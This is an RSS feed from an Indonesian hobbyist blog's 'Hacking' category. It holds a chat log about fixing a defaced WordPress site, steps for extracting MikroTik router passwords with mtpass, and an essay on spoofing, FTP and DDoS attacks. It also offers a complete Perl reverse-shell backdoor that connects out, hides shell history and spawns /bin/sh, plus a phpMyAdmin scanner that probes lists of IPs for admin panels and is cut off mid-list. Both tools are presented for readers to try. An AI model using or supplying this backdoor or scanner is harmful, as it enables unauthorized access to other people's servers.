<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>-=[banksonk a.k.a bento]=- &#187; Hacking</title>
	<atom:link href="http://www.kukukakikukakukaku.com/category/hacking/feed" rel="self" type="application/rss+xml" />
	<link>http://www.kukukakikukakukaku.com</link>
	<description>www.kukukakikukakukaku.com</description>
	<lastBuildDate>Wed, 10 Aug 2011 04:14:43 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Hayooo&#8230; belajar mad&#8230;</title>
		<link>http://www.kukukakikukakukaku.com/hayooo-belajar-mad.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/hayooo-belajar-mad.sonk#comments</comments>
		<pubDate>Sun, 29 Aug 2010 18:42:00 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Coretan]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[belajar]]></category>
		<category><![CDATA[fanta]]></category>
		<category><![CDATA[hendrik]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=235</guid>
		<description><![CDATA[hahahhahahha&#8230; sak hosting kenek deface kabeh&#8230;. jemb*d&#8230;  
[h3r3y] hoi
[h3r3y] orep?
[F] hoi
[bento] ha
[F] cara reset wp-admin e pie?
[bento] iki sopo
[bento] ?
[F] jancok
[F] hendrik
[bento] aslkdfjdsklfjsdklf
[F] Fu
[bento] kenek hack a
[bento] laskdfdslkfs
[bento] podo
[F] siktas ngerti
[F] klaaljalaiiaiailajaa
[F] moso?
[bento] aku pisan
[bento] kutil barang
[bento] 
[bento] masuk o cpanel
[bento] iki aku lg maintenance pisan
[bento] 
[F] wis masuk cpanel
[F] trus pie
[bento] masuko database
[bento] [...]]]></description>
			<content:encoded><![CDATA[<p>hahahhahahha&#8230; sak hosting kenek deface kabeh&#8230;. jemb*d&#8230;  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/jittery.gif" alt=":jittery_tb:" /><br />
<code>[h3r3y] hoi<br />
[h3r3y] orep?<br />
[F] hoi<br />
[bento] ha<br />
[F] cara reset wp-admin e pie?<br />
[bento] iki sopo<br />
[bento] ?<br />
[F] jancok<br />
[F] hendrik<br />
[bento] aslkdfjdsklfjsdklf<br />
[F] Fu<br />
[bento] kenek hack a<br />
[bento] laskdfdslkfs<br />
[bento] podo<br />
[F] siktas ngerti<br />
[F] klaaljalaiiaiailajaa<br />
[F] moso?<br />
[bento] aku pisan<br />
[bento] kutil barang<br />
[bento] <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/laugh.gif" alt=":D" /><br />
[bento] masuk o cpanel<br />
[bento] iki aku lg maintenance pisan<br />
[bento] <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/laugh.gif" alt=":D" /><br />
[F] wis masuk cpanel<br />
[F] trus pie<br />
[bento] masuko database<br />
[bento] nak wp-user lak gak salah<br />
[bento] nak kunu enek user passwd<br />
[F] sik<br />
[F] mysql database?<br />
[bento] http://gantengtapikere.com/<br />
[bento] kenek pisan<br />
[bento] <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/laugh.gif" alt=":D" /><br />
[bento] kabeh sak hosting<br />
[bento] <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/laugh.gif" alt=":D" /> =))<br />
[bento] njembodddddd<br />
[F] alsakljslkajlksjkla<br />
[F] sik toh<br />
[F] pie iki<br />
[F] melbu database?<br />
[F] sing ndi<br />
[F] rasah urus sing liane sik<br />
[bento] sing phpmyadmin ae<br />
[bento] sing gampang<br />
[F] io melbu ndi seh<br />
[F] jelasno ae<br />
[bento] sik<br />
[bento] pertama masuk cpanel<br />
[bento] bar ngunu goleki phpmyadmin<br />
[F] trus<br />
[bento] buka table database e<br />
[bento] goleki sing wp-user<br />
[F] ndi table database e<br />
[bento] kan ketok iku<br />
[F] ndak enek i<br />
[bento] jasik<br />
[bento] wedus<br />
[bento] sebelah kiri lho<br />
[F] Databases<br />
[F] Database Descending<br />
...<br />
...<br />
[F] iku cuman<br />
[bento] ndi kene cpanelmu<br />
[F] fantalicious.org/cpanel<br />
...<br />
...<br />
[bento] wes<br />
[bento] jajal login<br />
[F] login nang ndi?<br />
[bento] http://www.fantalicious.org/wp-admin/<br />
...<br />
...<br />
[bento] <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/laugh.gif" alt=":D" /><br />
[bento] lek ndak salah iku file index.php ne di replace<br />
[bento] <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/laugh.gif" alt=":D" /><br />
[F] ndi file index e?<br />
[bento] anng cpanel kan enek<br />
[F] lha sik<br />
[bento] holoh iki duwe blog tapi ndak reti opo2 ikz<br />
[F] iki mari melbu nang wp -admine<br />
[F] ate diapakne?<br />
[bento] <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/laugh.gif" alt=":D" /><br />
[bento] gak ngaruh<br />
[F] wancok<br />
[bento] hahah<br />
[F] trus pie balekno?<br />
[bento] sik<br />
[F] nguruk i iku intine mad<br />
[F] mbuled ae<br />
[F] koyok iteL kowen<br />
[bento] nang theme<br />
[bento] iku gantien theme awakmu<br />
[bento] ato<br />
[bento] lek awakmu duwe arsip theme iku<br />
[bento] uploadten maneh<br />
[bento] timpa karo sing anyar<br />
[bento] lek ndak<br />
[bento] sementara gantien disik theme e<br />
[bento] engko tekon nak sing ngurus blogmu<br />
[bento] bek nowo duwe arsip theme<br />
[bento] oyi<br />
[bento] sing jelas<br />
[F] wis gnti theme<br />
[F] gak ngaruh i<br />
[bento] passwd wp-admine wes mbalek<br />
[bento] lha ngaruh i<br />
[bento] refreshen<br />
[bento] awakmu lho gawe proxy warnet e<br />
[bento] nang kene wes ganti kok<br />
[F] coba delok en<br />
[F] tiku<br />
[F] ouw<br />
[F] nge chace<br />
[bento] wes ganti sayyank<br />
[bento] ho oh<br />
[bento] refres bolak balik ae</code></p>
<p>hoalah mad&#8230; duwe blog dewe kok bingung  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/devil.gif" alt=":devil_tb:" />.. ketoro lak ndak gawe dewe ikz&#8230; hayuk blajar mad ojok PBan tok &#8230; <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/drunk.gif" alt=":drunk_tb:" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/hayooo-belajar-mad.sonk/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>I S4udi h4ck Where Are Your security</title>
		<link>http://www.kukukakikukakukaku.com/i-s4udi-h4ck-where-are-your-security.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/i-s4udi-h4ck-where-are-your-security.sonk#comments</comments>
		<pubDate>Sun, 29 Aug 2010 17:42:49 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Coretan]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[akhirnya]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=233</guid>
		<description><![CDATA[

allah akbar STooP Admin .. ! ~@ I S4udi h4ck Where Are Your security ” It’s %0 Your Server Get Root ! I C0ntR0L We Are Here And There And Every Where..!! And Now Your Server In H3LL Dude..!! But Please Admin Don’t Cry Because I Laugh of Your Funny Face For Connect Us :
hihihihi&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://i266.photobucket.com/albums/ii259/banksonk/hack.jpg" alt="" width="400" height="300" /></p>
<p style="text-align: left;">
<p><code>allah akbar STooP Admin .. ! ~@ I S4udi h4ck Where Are Your security ” It’s %0 Your Server Get Root ! I C0ntR0L We Are Here And There And Every Where..!! And Now Your Server In H3LL Dude..!! But Please Admin Don’t Cry Because I Laugh of Your Funny Face For Connect Us :</code></p>
<p>hihihihi&#8230; akhirnya kena deface juga.. <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/devil.gif" alt=":devil_tb:" /> paling tidak seperti itulah sekilas jadinya weblog saia yang kena hack&#8230;  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/blush.gif" alt=":blush_tb:" /> and thank`s untuk anak&#8221; S4udi h4ck yang uda bisa masuk matur suwun sudah di ingatken <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/wub.gif" alt=":wub_tb:" />  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/i-s4udi-h4ck-where-are-your-security.sonk/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Recovery Password Mikrotik</title>
		<link>http://www.kukukakikukakukaku.com/recovery-password-mikrotik.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/recovery-password-mikrotik.sonk#comments</comments>
		<pubDate>Mon, 10 May 2010 09:19:54 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[mengembalikan]]></category>
		<category><![CDATA[mikrotik]]></category>
		<category><![CDATA[mtpass]]></category>
		<category><![CDATA[mtpass v0.5]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[recovery]]></category>
		<category><![CDATA[router]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=180</guid>
		<description><![CDATA[uda ane praktekin ternyatah bisa&#8230;..  
awal cerita PC router di kantor ada yang ganti passwdnya   coba googling nemu tuh link mtpass v0.3, ternyatah uda kagak bisa di pake tuh mtpassnya&#8230;..alhasil passwd masih terencript&#8230;trus ane coa googling lg nemu mtpass v0.5, dan hasilnya maknyus passwdmya bisa terbaca semua dengan jelas&#8230;aseeeek    [...]]]></description>
			<content:encoded><![CDATA[<p>uda ane praktekin ternyatah bisa&#8230;.. <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/clap.gif" alt=":clap_tb:" /> <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/wub.gif" alt=":wub_tb:" /><br />
awal cerita PC router di kantor ada yang ganti passwdnya  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/furious.gif" alt=":furious_tb:" /> coba googling nemu tuh link mtpass v0.3, ternyatah uda kagak bisa di pake tuh mtpassnya&#8230;..alhasil passwd masih terencript&#8230;trus ane coa googling lg nemu mtpass v0.5, dan hasilnya maknyus passwdmya bisa terbaca semua dengan jelas&#8230;aseeeek  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" />  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/tongue2.gif" alt=":tongue2_tb:" /></p>
<p><code>1. booting PC router pake cd linux live CD kayak ubuntu ato apalah yg laennya (ane sih ake ubuntu)<br />
2. kalo uda masuk dekstopnya kemudian copy file <strong>user.dat</strong> letaknya di <strong>/nova/store/user.dat</strong> (copy pake flashdisk ato apalah terserah). trus reboot dan masuk mikocok lagi...<br />
3. pindah ke PC yang ada OS linuxnya (distro terserah asal uda di install pakage <strong>g++</strong>, ane pake debian lenny).<br />
4. extrak dulu file mtpass v0.5 pake perintah <strong>tar -xvjf namafile</strong><br />
5. masuk ke direktory hasil extrak trus compile file <strong>mtpass.cpp</strong> dengan perintah <strong>g++ -lssl -lcrypto mtpass.cpp -o mtpass(nama file hasil compile)</strong><br />
6. hasilnya ada file baru yaitu <strong>mtpass</strong>, trus copy file user.dat dalam folder tempat mtpass(nama file hasil compile)<br />
7. finishing jalankan dengan perintah <strong>./mtpass user.dat</strong><br />
8. contoh hasilnya ada <a href="http://photo.lareosing.org/image.php?id=EF08_4BE7CA04&#038;jpg"><strong>disini</strong></a></code></p>
<p>**yang mau mtpass v0.5 ada <a href="http://manio.skyboo.net/mikrotik/mtpass-0.5.tar.bz2"><strong>disini</strong></a></p>
<p>selamad mencoba kawand&#8230;..  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /></p>
<p>thank`s<br />
banksonk </p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/recovery-password-mikrotik.sonk/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>cracker attack&#8230;</title>
		<link>http://www.kukukakikukakukaku.com/cracker-attack.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/cracker-attack.sonk#comments</comments>
		<pubDate>Tue, 10 Nov 2009 18:23:48 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[broadcasting]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[flooding]]></category>
		<category><![CDATA[ftp attack]]></category>
		<category><![CDATA[ip spoofing]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=94</guid>
		<description><![CDATA[1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker [...]]]></description>
			<content:encoded><![CDATA[<p>1. IP Spoofing</p>
<p style="text-align: justify;">IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker. protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP) dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran. Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikan dan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain, Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan. Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan setiap serangan spoofing.</p>
<p>2. FTP Attack</p>
<p style="text-align: justify;">Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.<br />
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.
<p>3. Unix Finger Exploits</p>
<p style="text-align: justify;">Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.
<p>4. Flooding &amp; Broadcasting</p>
<p style="text-align: justify;">Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.<br />
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan. Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles ketika serangan ini dijalakan melewati UDP.<br />
Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers, tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router. TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service). Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang dengan cara ini. Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari berbagai alamat IP secara berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan oleh system yang sudah terkena serangan sangat parah).<br />
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/cracker-attack.sonk/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Tak ada piNtu&#8230; jendela puN jadi&#8230;</title>
		<link>http://www.kukukakikukakukaku.com/tak-ada-pintu-jendela-pun-jadi.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/tak-ada-pintu-jendela-pun-jadi.sonk#comments</comments>
		<pubDate>Fri, 23 Oct 2009 04:17:30 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[perl]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=54</guid>
		<description><![CDATA[Dunia cyber emank syerem&#8230; hihihihihihi&#8230;atut   
walaupun ga punya kunci pintu jendela terbuka pun jadi&#8230;. kayaknya kata² itu pas untuk script backdor berikut&#8230;:
#!/usr/bin/perl
use IO::Socket;
#
#/home/programing$ perl dc.pl
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#/home/programing$ perl dc.pl 127.0.0.1 2121
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 [...]]]></description>
			<content:encoded><![CDATA[<p>Dunia cyber emank syerem&#8230; hihihihihihi&#8230;atut  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/annoyed.gif" alt=":annoyed_tb:" /> <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/shock.gif" alt=":shock_tb:" /></p>
<p>walaupun ga punya kunci pintu jendela terbuka pun jadi&#8230;. kayaknya kata² itu pas untuk script backdor berikut&#8230;:</p>
<p><code>#!/usr/bin/perl<br />
use IO::Socket;<br />
#<br />
#/home/programing$ perl dc.pl<br />
#<br />
#Usage: dc.pl [Host] [Port]<br />
#<br />
#Ex: dc.pl 127.0.0.1 2121<br />
#/home/programing$ perl dc.pl 127.0.0.1 2121<br />
#<br />
#[*] Resolving HostName<br />
#[*] Connecting... 127.0.0.1<br />
#[*] Spawning Shell<br />
#[*] Connected to remote host<br />
#<br />
#bash-2.05b# nc -vv -l -p 2121<br />
#listening on [any] 2121 ...<br />
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121<br />
#<br />
#--==Systeminfo==--<br />
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux<br />
#<br />
#--==Userinfo==--<br />
#uid=1001(rocu) gid=100(users) groups=100(users)<br />
#<br />
#--==Directory==--<br />
#/root<br />
#<br />
#--==Shell==--<br />
#<br />
$system	= '/bin/sh';<br />
$ARGC=@ARGV;<br />
print "--== Rampok si kacRuT ==-- \n\n";<br />
if ($ARGC!=2) **<br />
   print "Usage: $0 [Host] [Port] \n\n";<br />
   die "Ex: $0 127.0.0.1 2121 \n";<br />
}<br />
use Socket;<br />
use FileHandle;<br />
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";<br />
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";<br />
print "[*] Resolving HostName\n";<br />
print "[*] Connecting... $ARGV[0] \n";<br />
print "[*] Spawning Shell \n";<br />
print "[*] Connected to remote host \n";<br />
SOCKET->autoflush();<br />
open(STDIN, ">&#038;SOCKET");<br />
open(STDOUT,">&#038;SOCKET");<br />
open(STDERR,">&#038;SOCKET");<br />
print "--== Rampok si kacRuT ==-- \n\n";<br />
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;<br />
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");<br />
system($system);<br />
#bento</code></p>
<p>selamad mencoba&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/tak-ada-pintu-jendela-pun-jadi.sonk/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Phpmyadmin Scanner Tools</title>
		<link>http://www.kukukakikukakukaku.com/phpmyadmin-scanner-tools.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/phpmyadmin-scanner-tools.sonk#comments</comments>
		<pubDate>Fri, 23 Oct 2009 03:59:53 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[perl]]></category>
		<category><![CDATA[shell]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=50</guid>
		<description><![CDATA[HiHiHiHiHiHi&#8230;dikasi tols temen nich&#8230;monggo yang mau nyoba&#8230;. 
#!/usr/bin/perl
# phpMyAdmin Checker
# Author: mHc@MimiZu (Re Edit) #
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
my ($add,$iplist,$url,@path,@raw_data);
print q(
phpMyAdmin Checker by mHc
);
if(@ARGV !=1) **
print "Usage: perl phpmyadmin.pl e.g. perl phpmyadmin.pl iplist.txt";
exit;
}
$iplist = shift;
@path = (
"/phpMyAdmin/",
"/PMA/",
"/admin/",
"/dbadmin/",
"/mysql/",
"/myadmin/",
"/phpmyadmin2/",
"/phpMyAdmin2/",
"/phpMyAdmin-2/",
"/php-my-admin/",
"/phpMyAdmin-2.2.3/",
"/phpMyAdmin-2.2.6/",
"/phpMyAdmin-2.5.1/",
"/phpMyAdmin-2.5.4/",
"/phpMyAdmin-2.5.5-rc1/",
"/phpMyAdmin-2.5.5-rc2/",
"/phpMyAdmin-2.5.5/",
"/phpMyAdmin-2.5.5-pl1/",
"/phpMyAdmin-2.5.6-rc1/",
"/phpMyAdmin-2.5.6-rc2/",
"/phpMyAdmin-2.5.6/",
"/phpMyAdmin-2.5.7/",
"/phpMyAdmin-2.5.7-pl1/",
"/phpMyAdmin-2.6.0-alpha/",
"/phpMyAdmin-2.6.0-alpha2/",
"/phpMyAdmin-2.6.0-beta1/",
"/phpMyAdmin-2.6.0-beta2/",
"/phpMyAdmin-2.6.0-rc1/",
"/phpMyAdmin-2.6.0-rc2/",
"/phpMyAdmin-2.6.0-rc3/",
"/phpMyAdmin-2.6.0/",
"/phpMyAdmin-2.6.0-pl1/",
"/phpMyAdmin-2.6.0-pl2/",
"/phpMyAdmin-2.6.0-pl3/",
"/phpMyAdmin-2.6.1-rc1/",
"/phpMyAdmin-2.6.1-rc2/",
"/phpMyAdmin-2.6.1/",
"/phpMyAdmin-2.6.1-pl1/",
"/phpMyAdmin-2.6.1-pl2/",
"/phpMyAdmin-2.6.1-pl3/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2-beta1/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2/",
"/phpMyAdmin-2.6.2-pl1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-rc1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-pl1/",
"/phpMyAdmin-2.6.4-rc1/",
"/phpMyAdmin-2.6.4-pl1/",
"/phpMyAdmin-2.6.4-pl2/",
"/phpMyAdmin-2.6.4-pl3/",
"/phpMyAdmin-2.6.4-pl4/",
"/phpMyAdmin-2.6.4/",
